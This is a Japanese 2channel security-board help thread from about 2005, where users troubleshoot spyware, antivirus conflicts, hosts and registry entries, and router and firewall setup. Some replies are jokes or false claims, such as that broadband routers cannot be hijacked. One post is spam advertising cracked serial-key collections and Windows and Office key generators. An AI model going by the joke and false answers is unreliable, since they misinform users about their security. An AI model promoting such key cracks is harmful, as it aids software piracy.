言っておくけど、ＮＴでは激しく動作不安定。
なくなく2000にしましたよ。

Web巡回中、NemuBarでjavaやActivXなどの項目を全て切っている状態でも、スパイウェアやウィルスに感染することはあるんですか？
アップローダーなどでexeファイルをクリックするとそうなる可能性が高いのは分かりますが、それすらもしなくて感染し得るんでしょうか？

>>363
ないとは言い切れない

NemuBarなどという怪しいもの使ってたら侵入されても不思議じゃない。

最近この板を参考にspywareなんかを色々導入したのですがおそらくそのころから
日経のサイト（http://www.nikkei.co.jp/）他いくつかまともなサイトが
見られなくなってしまいました。（「サーバーが見つかりません。」「ページを表示できません。」が出る）

入れたソフトは全部覚えてるわけではないのですがspyで検索するだけで
Spybot, SpywareBlaster, Spy++が出てきますし（spy++はMicrosoft Visual Studio .NET 2003\Common7\Toolsに
入ってるspyxx.exeからのリンクなので無関係かも）
あと検索には引っかからないのですがIE-SPYADも使ったような気がします。

そのほかAd-Aware SEはかなり以前から使っていたのですがこの時には問題なかったような気がします。
（確信ではないのですが）

これらすべてをアンインストールしたら直るものなのでしょうか？
それとも制限サイトを登録してしまったらアンインストールしても無駄でなにか
他のことをすべきなのでしょうか？ソフトが多いので途方にくれています。
対策を教えてくださるととても助かります。

なおこちらはWindows XP sp2, celeron2.3GHz、OCNの１２M ADSLを使用。
IE6,　Lunascape1, Firefoxどれでも上記の症状は同じです。

Nortonのウイルス定義ファイルのLive updateが実行できません。「Live updateを再インストールしてください」と出たのですが、
どうやって再インストールするのでしょうか?

>>366
>（「サーバーが見つかりません。」「ページを表示できません。」が出る）

これ基本的に404エラーでしょう？
制限付きサイトに登録したのとは関係ないよ
hostsファイルにドメイン登録されていないかな？
C:\WINDOWS\SYSTEM32\DRIVERS\etc\hosts
このファイルね
たぶんやったのだとしたらspybotで登録させたのかな？
でも、spybotでは登録しているサイトじゃないんだよなあ？
基本的にnikkeiのトップページなどは制限付きサイトに登録されていても表示されるので、
特定のサイト内のページが表示されないのなら、クッキーを拒否している影響だと思いますよ
インターネットオプションから見られるし、登録、削除も出来るんだけど
単に禁止サイトの登録を削除するのならレジストリキーを削除してしまった方が
やりやすいと思うので参考までに書いときます

制限付きサイト
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains

クッキー禁止サイト
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History

許可サイトも値違いでここに登録されるんだけれど説明は省略します

>>366
ノートン使っているのなら、リファラーを送るようにしてやらないと
表示してくれないページも発生するからね

>>335
MS05-002のWindows98 98SE Me用修正プログラムの可能性も有る
>>167 >>285

>>362
動作が不安定だったのは、アウトポストのことですか？それともkerioのことでしょうか？m( _ _ )m

春揚げ

>>371
どっちもです。ただ、そのときはsp4だったので、sp6aまで当てたら
どうなるかは試してません。ぜひ試してレポよろしく。

>>368
ありがとうございます
\Domainsと\Historyをいったん削除して新規に同じものをつくって再起動したところ
久しぶりに日経が読めるようになりました。助かりました。

>>369
ありがとうございます。ノートンは使っていなかったのでそれはOKでした。

>338です
どうしてもISTsvcが消去できません
ad-ware6でもだめです
セイフモードにしてad-ware起動させても本体が消えてくれません

助けてください・・・・

>>375
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_CLICKER.F&VSect=T
先ず調べようぜ

>>375
>ISTsvcってTempフォルダ内に
インストーラーファイルが仕掛けられていたりするんだよな

>>375
ついでに
Ad-awareSEにしとけ
6はもううｐデートできないよ

>376-378
大変助かりました
ありがとうございました・・・

再起動したときに復活してないことを祈ります

ノートンの２００５を買ったのですが、
これって２台のパソコンにインストールしても問題ないですか？
ライブアップデイトはしない方がいいとかありますか？

>>380
通報しといた

>>280
>>281

全部完璧に消去できました。
怪しいのが確かに１個ありました。
それを消したら大丈夫でした。
レス遅れて大変申し訳ありません。

あういｓｆぢおｊｄｓふぁじょいｄｓｆ

>>288
Jetico Personal Firewall
ttp://www.jetico.com/

>>373
どっちもですか。(・∀・;)
うちは6aまで当ててる（ハズ）なので条件は違うかもしれませんが。

>>384
ありがとうございます。
海外ソフトでは結構あるものなんですね。
う〜、迷う。。。（笑）

>>336
おお、超�d�dです。
とりあえず、ad-wareをインスコ。次に通常の状態でスパイウェアを除去。
更に同じ状態でspybotのスキャンをしたら、初めてほめてくれました。
そのうちセーフモードでもやってみようと思います。

>>286
何で最初からセーフモードでスキャンしないんだ？
意味わかってるのか？
その中には実行中になっているプロセスはスキャン時に身を隠して
ソフトで引っ掛からないのも存在するんだぞ！
俺が言っている事は、全て自分で検証した上での発言だからな

バカはほっとけって事だｗ

ふぅー
やっとこの板から厨どもの無駄な釣り書き込みがなくなったか
こいつら、次から次からスレ上げやがってどうしようもねえな！
もう来んなってんだ

RAID環境でも使用できる、アンチウィルスソフト在りませんか？
ウィルスバスター２００４、ノートンインターネットセキュリティー２００５
双方とも、ダメでした。
　すぐブルー画面でてしまって、、、、今はすべてUninstallして不都合無く
動いています。
　RAIDカードは、PromiseのTX4200でRAID0にて使用してます。
　OS：XP-HOME(sp2)
　MB：P4PE（ASUS)
　HDD：Seagate　SATA160G*3

SpywareBlasterを使っていて、こまめに更新しているんですが、Ａd−Ａware
で検索するとスパイウェアが検出されてしまう事が多々あります。なぜですか？？

>>1

ＡＤＷ_ＩＳＥＡＲＣＨが削除しても残っています。
ウイルスバスターとＳｐｙｂｏｔ、ＳＰＹＷＥＡＲＢＲＡＳＵＴＥＲ、Ａｄ＿Ａｗｅａｒを
使ってます。ＩＥは高にしてます。ＯＳはＸＰです。
ＳＥＡＲＣＨＩを完全に消すにはどうしたらいいのでしょうか。

「いくら設定を変えてみても、WV２００５だと、ブルースクリーンが出」、
「別の軽いソフトの体験版に変えて」「インストールして、再起動すると、
そこでブルースクリーンが出」る模様なのですが、
WVってもしかしてウイルスバスターかな？とも思うのですが、
原因について何かわかりませんでしょうか

OSはMeだと思います

(´-`).｡oO(何の話をしているのか、何かの続きなのか、意味不明だな…)

211.94.130.23X
218.61.13.15X
新入されました、フォローよろしく

windowsMe、ウイルスバスター使用。ブラウザはIE（1番新しいもの）。
ADSL回線でプロバイダはDION。
sleipnirは大丈夫なのですがIEを開こうとすると青画面になります。
関係ないかもしれないけどsleipnirの検索ボックスに文字が入らないことがあります。

リアルタイム検索で13日に、TROJ_SMALL.QN　と　TROJ_BDIA　が発見されて駆除したとログにありました。
また、14日のログには「駆除できませんでした」とあり、
全部検索してみたら上と同じ２つが　C:\_RESTORE\ARCHIVE\FS22182.CAB　にありました。

A1259765.CPYとA1259793.CPYにあるのがわかり、削除しようかと思ったのですができませんでした。

どうすればいいんでしょうか？

>>398
>青画面
この間のWindows Updateで一部環境でトラブルが出ている模様。
「アプリケーションの追加と削除」から「Windows 98 Q891711」をアンインストール。
>_RESTOREの「駆除できませんでした」
http://www.google.com/search?hl=ja&q=_RESTORE+%E9%A7%86%E9%99%A4%E3%81%A7%E3%81%8D%E3%81%AA%E3%81%84&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

ウイルスが落ちているサイトってどこにあるの

>>400
板違い。どっか池

良い＆安い（もしくは無料）スパイウェア除去ソフトってありますか？
ちなみにマカーでつ。

IEHijacker.Hotoffers　スパイウェアが無限にでてくるぽ(´Д⊂
ノートン常駐してるからウィルスじゃないんですよね？
スパイウェア駆除ソフト３つ入れてみたけど駆除できない；
どうしたらよいですか？（´・ω・`）

あ、セーフモードで駆除してないぽｗ
やってくりゅ

だめだった・・・・・・・助けて(⊃д⊂)

Macにスパイウェアがあると認識してる人が少なけりゃ、ろくにソフトが
できないんじゃないだろうか。ぐぐればまずWebtunnelというのが見つかる
が、当然それは使ってるよね。

>>403
ＯＳ再インスコ

>>407
OKボスｗ
調べてみたら相当やっかいだった・・・私のスキルじゃ無理

>>408
C:/WINDOWS/system32/systr.dll消して
(HijackThis.exeで出る？)
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.hotoffers.info/a0002/

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = NOT USED (OK)
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - (no file)
O2 - BHO: (no name) - {16664845-0E00-11D2-8059-000000000000} - (no file)
これ消せばいいかも的なのぐぐって見たけど

IEのコンポーネントを使用しているブラウザの場合には危険度は変わらないと思うのですが
何故IE以外のブラウザを使っていると安全度が増すのですか？

脳内

>>411
勝手に安全度が高いと思い込んでるだけということですか？

インターネットやっててIEに脆弱性云々のニュース見ない？
使っている人が多いから狙われ易いというのと
脆弱性が露呈された時に他のモノの方が対応が早い(オープンの某有名)

と書きながらIEを使いIEコンポーネントの専ブラで書いてるけどw

先日からグーグルのエンコードがおかしい…
日本語に設定し直しても強制的に元に戻されるし
もしかしてウィルスですか？

OS:WIN98
ﾌﾞﾗｳｻﾞ：IE
共有ソフト：WINMX

前から、急に画面が激しく縦揺れすることがあります。
やはり、ｳｲﾙｽでしょうか？
トレンドマイクロのオンラインチェックでは感染ナシです。
でも、どう見てもおかしいです。
どなたかわかる方いらっしゃいましたら
ご教授くださいませ。

>>415
ハードが古くなっただけとか？

>>414
googleは鯖をいじった事を隠してる

ayutanと入ったサイトをクリックしてしまいました。
バスターで削除できません。
助けてください

>>387
よく分かってないからこのスレにきてるんだよ。( ´∀`)σ)Д`)
ついでに違いも教えてもらえないでしょうか?
それから、改めて言われたとおりにやったら39匹もでやがった。。。
とりあえず、全部消えたみたいだけどこれで委員ですか?

>>419
逆切れしてるような印象を与えるレスでつね

>>399
ありがとうございました。どうにか隔離できました。

_RESTOREにある.CABとか.CPYって削除しても大丈夫でしょうか？
大丈夫なら消してすっきりしたいのですが。

>>420
文章って難しいですな。

nyやMXを使うということは、誰にも助けてもらえないということだ・・・

XP、Norton AntiVirs使用、ブラウザはLunascape2、時々IE(最新)。
アンチスパイウェアはAd-AwareSEとSpybotを使用。更新はまめにしています。
ADSL回線で@niftyです。

大きな画像を見る機会が少なかったので気づくのが遅れたのですが、
ttp://rerere.servebeer.com/src/up2222.jpg
このように、画像にカーソルを置くと、画像の右上に変なボタンが出ます。
ちょうどマルチメディアバーのように。
そこでNortonでパソコンを全部スキャンし、Ad-AwareとSpybotでもスキャンを
しましたが特にこれといったものは引っかからず、
今もこの変なボタンは出現します。
押すとどこかに飛ばされるようです。
(スキャン前に一瞬クリックしたら別窓が立ち上がりましたので即消しましたが)
これ以上どうすればいいのか、検索をしたけれどよく分からず、途方に暮れています。
いい解決方法はありませんでしょうか。よろしくお願いします。

手机は中国語で携帯電話。スパイウェアじゃないの？
spywareBlasterでレジストリのスナップショット取っていたなら
復元できるかもね。

>>424
一度でもセキュリティをオフにしてＨＰを見た事があるようですね。
一旦感染してしまうと既存のウイルス対策ツールでは検出できないウイルスやトロイがあります。
ttp://www.itmedia.co.jp/enterprise/articles/0502/18/news027.html　　

＞カーネルrootkitsは感染したマシン上で密かに動作し、
＞現行のセキュリティ製品ではほとんど検出不可能、　　　　←ここ
＞中には暗号化まで利用するものもある。（IDG）

感染してしまえば、ノートンだろうがマカフィーだろうがトレンドマイクロだろうが
検出は不能。だから、常にActivXやらJavascriptやらExploitについてキチっと
ガードできるソフトを入れて防備してなければ、感染した後に検索しても気休めでしかない。

それは古いタイプは検出するが、今現在流行しているものには対応できないから。
再インストールしてください。

おまいら俺のパソコン潰しただろ！！
起動できねーじゃねーか！！
弁償しろ！

>425,>426
素早いお答えありがとうございます。
>425
スナップショットの事をすっかり忘れてました…＿|￣|○
というわけで復元したら、あっさりボタンが消えました。
でも
>426
こういうものだったりしたらお手上げですね。
うかつさを反省しつつ、これを機に再インストールする事にします。
お二方のご親切に深く感謝致します。
どうもありがとうございました！

>>424
このタイプの質問、最近増えてきたなぁ。
どこで拾ってくるんだろう。

>>429
まあ、わかるだろうよ。
ところで、この手のやつでウイルスのパターンはすぐ対応されるけど、
中国とかで発生したトロイタイプのパターンはなかなか対応されない。

まあ、販売数の３桁違いのlivupdateが行われているような
状況で、キチンと検体を提出してくれる人なんておらんだろうしな。

こんにちは。ウィルスソフトの更新or新規購入について質問です。
PC環境はwin.XP、ブラウザはIE6、ADSL回線です。
PC購入時よりノートンが入ってますが、2002年で期限が切れてます。
恥ずかしながらセキュリティに疎かった為、今まで更新をサボっていました。

今後仕事でもパソコンを使う為、セキュリティ対策をしっかりしたいと思い、
シマンテックのショップでノートンの更新を購入しようと思ってサイトを覗いて見たのですが
2002年で期限が切れている現状だと、2003年版、2004年版の両方を購入し、
さらに2005年版も購入しないといけないのでしょうか？

それとも2005年版という最新のソフトをお店で買ってインストールすれば
更新をサボっていた数年間に出現したウィルスも全部まとめて退治できますか？
よろしくお願いします。

釣り

431は高卒か

平日の昼間から釣堀とは粋ですなぁ…

仰る通り高卒のオサーンです。
あまりＰＣ使ってなかったモンで･･･
もう面倒だから仕事用に新しくＰＣ新しく買い替えようかな。
失礼しました（＾＾；

>>435
マジレスすると、それぐらいのことシマンテックのサイト見ればわかるし、よく考えてもわかるでしょ。
アプリ更新するたびにPCも買い換えるのかよ…

mac osxはセキュリティーソフトはいらないか？
いるのなら、どんなのがおすすめでしょうか？

今までトレンドマイクロのオンラインスキャンをしていて
ウィルスが検出されたことは一度も無かったんですが、
初めてシマンテックのオンラインスキャンをしてみると、
一個検出されて、その感染ファイルが２ちゃんのログ
みたいなんですが、これはいわゆる「ノートンの誤反応」
ってやつなんでしょうか？

MacでもLinuxでもファイヤーウォールは欲しいよね。
http://www.symantec.com/region/jp/products/nis_mac/index.htmlとか。
元々ノートンはMac用から発展してきてるし。

>>438
なんでもいいからアンチウィルスソフトを常駐させてから誤反応について悩め。

マックはスパイウェア対策で高い金払わせるソフトばかりだな
フリーウェアは数が少ない。

教えて下さい。
OS＝XP　ブラウザ＝IE　セキュリティーソフト＝ウイルスセキュリティー
症状　WINDOWSやProgram Filesなどが入っているハードディスクに
勝手に「Buffers」という動画ファイルが作られます。見ていると時間の
経過とともに容量が大きくなっていきます。

ソースネクストのウイルスセキュリテーでウイルスチェックを掛けても
何にも検出されません。
何かしらウイルスがあると思ったので、ウイルスバスターのオンライン
スキャンを行うと、「ANTINNY.I」が検出されたので、手動でファイルを
消しました。
ですが、相変わらず「Buffers」というファイルが作られて、次第に大きく
なって行きます。

分かる方、対策を教えて下さい。

　

>>442
ﾀﾞｳｿ板へ(・∀・)ｶｴﾚ!

>>442
検出されない親玉のインストーラーが実行されているから
起動メカニズムに詳しくないのなら、見つけ出せない
エロ助スレでも参考にすればいい

ノートンアンチウイルスのメインウィンドウの左上の方にある
Norton AntiVirusって書いてあってクリックすると飛び出るボタンは何の意味があるんですか？

>>445
押すとアンチビールス機能がオンになります。
もう一回押すとオフになります。

バッファロー製有線BroadBandルータ BBR-4HG
Norton Internet Security2005

Ad-awareSE
Spybot
SpywareBlaster

ネットバンキングを始めるのに、上記のものを用意しようと思っています。
自宅からのみログインし、windows updateも忘れずにするつもりです。

他にも用意したり、心がけた方がいいことがありましたら教えて下さい。

>>447
・IE以外のブラウザ
・万全だからと油断しない心

これで完璧！

worm rｂotというのに感染してしまったのですが
どうやったら削除できるのでしょうか？
今までのウイルスは全部ウイルスバスターが削除してくれていたのですが
これはできないみたいなので・・・

>>449
それほど害はないから放っておくのも手だよ。

>>450
回答ありがとうございます。
害はないんですか。
でもなんとなく気になる＾＾；
自分が感染してるせいでほかの人に感染させるのもなんとなく嫌だし・・
やっぱり手動で削除するとなると初心者にはきつい操作しないといけないのでしょうか？

>>451
害がないことはないような・・・
トレンドマイクロのサイトからauto_tscをダウンロードして駆除してみれば？

>>451
ちゃんと読んでください！

　　『それほど』害は無い

なんですよ。分かってます？

ﾜﾛﾀ

ｽﾊﾟｲｳｪｱにかかってしまいました。
アンチウェアでクリティカルオブジェクとを0にしたんですが、
書き込みをすると公開プロクシーは書き込みは出来ません！と
でてきます、マジにヤバイ状況というのは分かってますが解消法がわかりません。今手元にPCがないので後に詳細を書きます

>>448
ありがとうございます。
ブラウザを探してみます。

プロキシサーバの匿名性の話でDNS漏れという言葉を耳にするんだけど
どういうこと？DNSリゾルバが参照してるDNSサーバがばれるの？

>>455
>>426を見て。
一旦感染してしまうと既存のウイルス対策ツールでは検出できないウイルスやトロイがあります。
ttp://www.itmedia.co.jp/enterprise/articles/0502/18/news027.html　　

クロスサイトスクリプティングはサーバー側で対処してもらうしか対策はないの？

ルータの不正アクセス検出みたらいつもSmurf (WAN-In)とIP Spoofing (WAN-In)が
一杯出てます。これってなにをされているんでしょうか？。
回線はケーオプティコムの光でルーターはBUFFALOのBBR-4MGです。
なにか対策はありますでしょうか？。
アドバイスお願いします_(._.)_

具ぐれよ

>>364
どのようなケースが有り得ますか？

スレ違いの質問でしたらすみません…。
IEのスタートページをヤフーにしているのですが
いつもの様にIEを立ち上げたところ、ヤフーの天気の所と着メロの所がリンク済みになっていました。
私はその二つのリンクのどちらも見たことはありません。
何故かいつも見ているオークションの所は未リンクになってました。
２ちゃんでも、見た事も無い板がリンク済になってました。
同じくいつも見てる板は未リンクでした。
特に被害があったわけではありませんが
まるで別の人が使ったブラウザを見てるようで怖いです。
PCに入れてるウィルスチェイサー（アップデートしてます）や
トレンドマイクロのサイトでスキャンしても何も検出されませんでした。
この様な事が起こるのは、ウィルス以外に何か原因があるのでしょうか。
ちなみにOSはMeで、WindowsUpdateはしています。

ファイアウォール入れてるか？

かぞくじゃない？そういうのって大半は。

>>462
１．ＩＥやＯＥの未知のセキュリティーホールを突かれて感染する。
２．ＪＰＧのセキュリティホールなどＯＳ本体の不具合を突かれる。
３．表面上は良く出来たツールなので思わずダウンロードするが、実はスパイ活プログラム。

など。

>466
jpgのセキュリティーホールとは何ですか？
1のケースと重複しない形でのセキュリティーホールが改善されることなく、いまだ存在しているんですか？
それと、存在していたとして、IEではなく画像閲覧ソフトで見たとしても感染することはあるんでしょうか？

1と3については納得しました。

>>466
早く答えろ
俺が正しい知識をこいつらに取り敢えず広めといたからな

>>467
現在の発見率で行くと、毎年必ず一つは重大なセキュリティホールが見つかります。
ですから、対策ソフトをインストールしていても、アングラサイトを巡回していた場合は、
一番最初に感染する可能性があります。
JPGのセキュリティホールは対応されたので大丈夫です。しかし、ＯＳ本体のセキュリティを
突くものは今後も現れると思います。

感染しない方法を以下に挙げますので守ってください。

１．メジャー系アンチウイルス・ＦＷを導入する
２．ルーターを設置する。
３．co.jp　go,jp　gov　有名な.com これ以外のアクセスはしない。
４．ウイルスサイトが放置されがちな国、地域は丸ごとブロック
　例　ロシア・東欧など

>>469
http://www.microsoft.com/japan/security/incident/download_ject.mspx
これかな？
マイクロソフトは、Microsoft Windows のコンポーネントである
Microsoft Internet Explorer をご利用のお客様に影響を与える、
Download.Ject として知られているセキュリティ問題の報告を確認しました。

朝パソをきって夜たちあげたらネットにつながらなくなっておったのです
設定はなにもいじってないし、ケーブルがはずれてるわけでもない

一人暮らしなのでほかの誰かというわけでもないです

そんでもってシステムモニタをみたら使用率が１００％
スパイボットなどでスパイウェアは検出されず

ｅｘｅを実行した覚えはないです
ｏｓはｍｅ
プロバイダーはｊ−ｃｏｍ
朝、切る前までは問題なかったのですが…
スタートアップになにかあるわけでもないです

誰か助けてorz

＞　３．co.jp　go,jp　gov　有名な.com これ以外のアクセスはしない。

だいぶ息苦しいような気がするが、安全性でいえばそうだろうな。
前にメールで来たサイトをクリックしたら、５回ぐらい転送されたあと
ウイルス付きのロシアサイトに飛ばされた（ｗ

んで、丸ごとブロックというより、日本とアメリカ以外は拒否で問題ないよ。

Win32:Mhtplo-8

このウイルスはどういった活動をするんですか？

XPsp２　IE６sp１　ウイルスバスター2005です。

ネットに繋いだだけで感染するウイルスがあると聞いたのですが
ウイルスソフトのアップデートする時は無防備になりますよね。
その時はどうすればいいんでしょうか？
（FWはウイルスソフトと同じになっています）
普段は切ってるXPのFWを使えばいいんでしょうか？
一応、ルーターはあります。

>>474
ルーターあれば平気だと思う。
あと、SP2なら今んとこそうゆうウィルスいないはず。

回答、ありがとうございます。

友人が前にネットに繋いだ途端、
ネットワークウイルス？の警告が出たと言っていたのです。
XPsp２でルーターも使ってたらしいですけど・・

警告なら問題ないんじゃないかな？
不正なパケットが飛んで来ただけとか・・・

ありがとうございます。
安心しました。

関連ある話として、ブラスターに感染して泣く泣く
システムの再インストール始めてやっと終わって
WindowsUpadateするためにネットにつないだ瞬間、
ブラスターにやられた笑えない話もあるから、
やはりルーターは必要かなぁ〜と思うよ。

ちきしょう俺はスルーか…orz

>>471
スパイの前にウイルスのチェックをしてください。
というか、情報不足、対応不能です。

朝つないだら普通につなげました。
どうやらプロバイダーの所為だったようでひとあんしんです。

ウイルススキャンをしたかったのですがいつもオンラインスキャンだったものでorz
参考までにウイルスだと疑うに足る情報ってどんなもんですか？

>>482
最近のウイルスはほとんど症状が無いのでなとも言えないですね。

フリーのアンチウイルスソフトを入れときたいんですけどね
リソースが…orz

>>484
２ｃｈに貼ってあるサイトを踏んだりしなければ
別に危険でもないでしょう。

>アダルトサイトに飛ばされ　
お気にに見知らぬサイトが登録されアダルト系
カジノインストールがアップされ
メディアプレーアー見ると
英語版のセキュリティー警告ダイアログボックス開く
これって
今流行のスパイ


上記の内容とまったく同じ症状がでてしまって困っています。
最初の頃は、スパイウェアか何かだろうと思い
アンチスパイ、アンチウイルスソフト等をつかって駆除しようとしましたが
まったく効果がなく、どうしたらいいのかわからないので
質問させていただきました。
どなたか駆除、対策方法を知っている方がいらっしゃるのでしたら
ご教授お願いします。

困ったときはすっきりくっきりリカバリー

>>486
厳しい言い方ですが、はっきりいって、どうしていいか分からないという
あなたに、取りえる対応としては入れなおすのが一番だと思います。

簡単なところではＩＥのテンポラリファイルやクッキーを全て削除して、
MSCONFIGでスタートアップを全て停止してみることをお勧めします。

>>487,488
早々とレスを下さって有難う御座います。

再インストールかリカバリのどちらかが
有効なんですね。試してみます。
有難う御座いました。

WinXP Pro SP2 AntiVir使っています。

D:\SYSTEM VOLUME INFORMATION\_RESTORE{F4B6CC14-73C0-42BA-9C12-B46D910F2602}\RP49\A0009002.EXE

Is the Trojan horse TR/Dldr.Avis.1

と出たのですが、そのようなファイルは存在していません。
scanを何度しても同様の WARNING! が出ます。
どう対処したらよいでしょうか、教えてください。

システムの復元切ってしまえ
それで解決

>>490
SYSTEM VOLUME INFORMATION\_RESTOREは、Windows の「システムの復元」機能がバックアップしたファイル。

「_RESTORE」フォルダまたは「System Volume Information」フォルダ内の感染ファイルを修復、検疫または削除できない
http://service1.symantec.com/support/INTER/navjapanesekb.nsf/45d24f3809a3963288256db3005f48d1/6443f1a70a2e79ba88256b060008794f

>>491, 492
ありがとうございました。警告が出なくなりました。

>>471
>>399 これかも？

>>457に答えてください

>>457
合格！

シリアルキー解析集「ALTEA」
大好評発売中！

http://openuser10.auctions.yahoo.co.jp/jp/user/dancexxx1960?


市販SOFTやオンラインSOFTのパスワード集です。
オークション関係から画像・OS・表計算・CAD・・・・etc
国内・国外のあらゆる分野のSoftを解析済です。


これを初めて手にされた時には、驚愕される事でしょう。
そして・・・手当たり次第にインストールを始める筈ですｗ
パソコンをご使用の方なら、必ず！満足されると思います。

解析結果のデータベースには１５，０００点を越えるパスワードが入ってます。
このパスワード集から検索するだけで、登録や制限解除が出来てしまいます。
シェアウェアを購入して、正規登録したのと同じ状態になります。
余りにもデータが多すぎる為、辞書引のようなパスワード検索SOFTで提供します。

シェアウェア以外にもパッケージ版をVectorなどでオンライン販売してるSOFTにも
多数対応しています。これらをダウンロードして無期限に試用する事も可能です(^^;

WindowsXPやOfficeなどのCDキー（プロダクトキー）ジェネレーターを使えば複数のパソコンに
インストールする事も可能です。デスクトップとノートPCなど2台以上持ってる場合は特に有効ですね。

オンラインSOFTを購入した経験は有りますか？
ありとあらゆる分野の優れたSOFTが、数多くありますよね。
しかし、ほとんどが試用期間や機能制限をして、「気に入ったら購入してください」です。

もう少し使いたいが使用期限切れで、削除・・・再インストールを繰り返していませんか？

マンションがケーブル対応なので
ケーブルテレビでパソコンを繋ごうかと考えているんですが

果たして安全なのでしょうか？
ついでに私は始めてパソコンを繋いだり契約したりするのです。
こんな状態の私でもセキュリティは大丈夫なのでしょうか

糞どもが

>>498
WindowsＵpdateをしっかりやって
アンチウィルスソフトをいれて更新をきちんとやっていれば
とりあえず大丈夫です。

つまりFWもルーターもスパイ関連もとりあえずは要らないと言う人発見

>>500
ケーブルが一番危なそうだと思ったので
聞いてみただけです。（マンション全部と繋がっているんだからね。）

勝手な想像のようなので、安心してケーブルを使います。
でも、無線ランとかだとセキュリティの設定の本とか
本屋でよく見かけるんだけど、ケーブルの場合はどこの
本屋にいっても置いていないような？

正直に言って少々不安です。

ケーブルがどうかは別として
マンションだったら少し気になるかも
FWとルーターは有った方が良いかもね

>>502
初めての割りには、２ｃｈのアンカーとか使い方はプロフェッショナルだな。

ちなみに、ケーブルは、マンションで一つのＬＡＮだ。
マンション内からの不正アクセスには相当の注意が要る。

たとえば、共用フォルダ。これは外部のインターネットから
見るためにはポートスキャンをかけるなどしてチェックして
みないと見えない。

しかし、マンション内では普通に誰でも見えてしまう。
Windows標準のＦＷで十分なのでポートは完全に閉じておいたほうが良い。

>>504
マジですか？
ついでにそのFWってのを設定していないと
どこのｗｗｗにアクセスしたのかとか
フォルダが筒抜けなんですか？

聞いてよかったです。
基本的なことを聞くようで申し訳ないんですが
FWってファイアーウォールの略ですよね。
私的にはそれで間違いのない事と思うんですが

セキュリティ板は全然見たことがなくて
ここのスレ自体も初めて見るので、いまいち
初歩的な事が解らなくて申し訳ありませんが・・。

ついでに私は２ちゃんねる自体は結構やっているんですが
自分でパソコンを繋げるのは初めてです。

ついでに私のパソコンにはマカフィーが
標準搭載されていました。

しかもスキャンとファイアーウォールしかついてなくて
これで大丈夫なのでしょうか？

絶対他の人に見られてはまずいです。
何故かと言いますと、このマンションは
住人同士が争っていて、みんな仲が悪く
そして入っている人間も得体の知れない
人間が多いので、何されるか解らないから怖い。

早く出たいんだけどな、トホホ・・。

>>506
https://grc.com/x/ne.dll?bh0bkyd2
はい　これでスキャンしてPASSEDになればよし
ならない時にはPingに対してEchoしないように設定する

>>506
ネタ、と思ってたけど、ここまでつまらんネタは無いだろうから、マジもんなんだろうな。
ちなみに、オレもケーブルだけど、ネットワークで仲良く５台のＰＣが見えま〜す。
共用フォルダも見えます（ｗ
中身は・・・画像とエクセルらしきものが入ってますが、これ以上は見ません。

という状態です。レポートを終わります。

>>507
私の直感的に何かヤバイ予感がするんですが？
ついでにいままではFWの略ってマジで知らなかったんですが
セキュリティー板の他スレを読んで調べた所、やはりそうでしたね。

これ、ネタではありません。
連続投稿すいません。

>>509
ポートが開いてるかどうかとかちゃんとしたセキュリティチェックサイトを探して

>>508
共有サービスとかリモートサービスって通常無効にしておくと思うんだけど
他人のが見えるのも嫌だし、自分のを見られるのも嫌だし
ましてやセキュリティ上最悪だし

>>511
ファイル共有をするだけで他人に見えるようになるよ。
そこまで考えてる人ってのは少数派ってことだね。

>>510
https://grc.com/x/ne.dll?bh0bkyd2
ここはちゃんとしたとこじゃないのかよ

>>508
どうやったら、完全に見えなくできるんですか？
やっぱりルーターしかないのですか？

でも、マンション内にそんなにパソコンに詳しそうな人は
いなさそう。だって・・。

無線ランとか光とかダイヤルアップとかだと
いろいろな本にセキュリティの方法が書いて
あるんだけど、CAの方法はどこの本屋にも
置いていないですよね。

それとも、基本的には同じなのでしょうか？

できたら、完全に近いような対策お願いします。

>>514
完全な対策は、ルーターを買う。
ＦＷソフトを買う。

これで何も気にしなくていいでしょうよ。

ルータのパケットフィルタリングが
デフォだとほとんどclosedなんだけど
stealthになるように塞ぐべきですか？
鯖とか立ててません

>>515
やはり今自分に必要なのはルーターですね。
ルーターって結構高くないですか？
「今月の予算的には」...

マカフィーのFWでは駄目なんですか？
できればこれで、二ヶ月位我慢したいと
考えています。

そして安心して、ルーターを購入という
流れを頭の中に描いています。「それまでの間なんですよね。」

でも、これである程度の防御ができるんなら、使っているうちに
スキルが上がってくると思うんで、いろいろ自分で考えてやって
いきます。大変長い間、皆さん失礼しました。

>>513
疑うなら自分で探して行くしかない

こないだ近所のLaoxでplanexの型落ちルータが特価1480円で出てた。
こまめに電器屋回ってれば、安く入手できるだろ。

知識がそもそもないから説明したって無駄
それなら、こうしろって言ったって、ああでもないこうでもないと言う
堂々巡りなのでレスする事自体が無駄

ルーターのポートがステルスじゃないとか
なんとか言ってる人が居るが、
ルーター越しにアクセスするにはルーターの
制御権を奪い取ることが必要。

ただ、今流行のブロドバンドルーターには
奪い取れるような機能は無いので
どうやってもハッキングできません。

最近、やたらと空メールが（一日に数十通）届くのですが、これってウィルスの仕業なのでしょうか？
しかも送信元のアドレスは全部違います。XPSP2でOEです。

AVGをいれててほかは何にもありません。オンラインスキャンはやりました。

>>522
プロバイダのウイルス除去サービス。
プロバイダがウイルス本体を除去してる。

俺522じゃない人
プロバイダのウイルス除去サービスってなんの説明もないの？

>>524
いや、本人が何もわからずＯＫしてしまい、
サービスされてるのに、メールの中身が
空です！ってのは死ぬぐらい既出。

>>521
稀にルーターのファームウェア等にセキュリティホールがあることはある
http://akademeia.info/main/securityhole/securityhole_cisco.htm

>>526
うむ。確かにありますね。
設定変更が出来るってことは、DMZ的な設定だって出来てしまうわけですから、
危険きわまりないですね。
HTTPサーバーなんて無いよ！とか思ってる人は、ブラウザでルータ簡単セットアップ！なんてなってる
ルーターは全てその機能があるわけですし。

ただ、普通のブロードバンドルーターはＷＡＮ側からHTTPサーバー機能は使えないです。
少なくても今売り出されているブロードバンドルーターをハイジャックできる例は
まだ発見されていないはずです。

ウィルスとスパイウェアに感染してしまったので、
ひと通り感染ファイルを削除してとりあえず問題解決したんですけど、
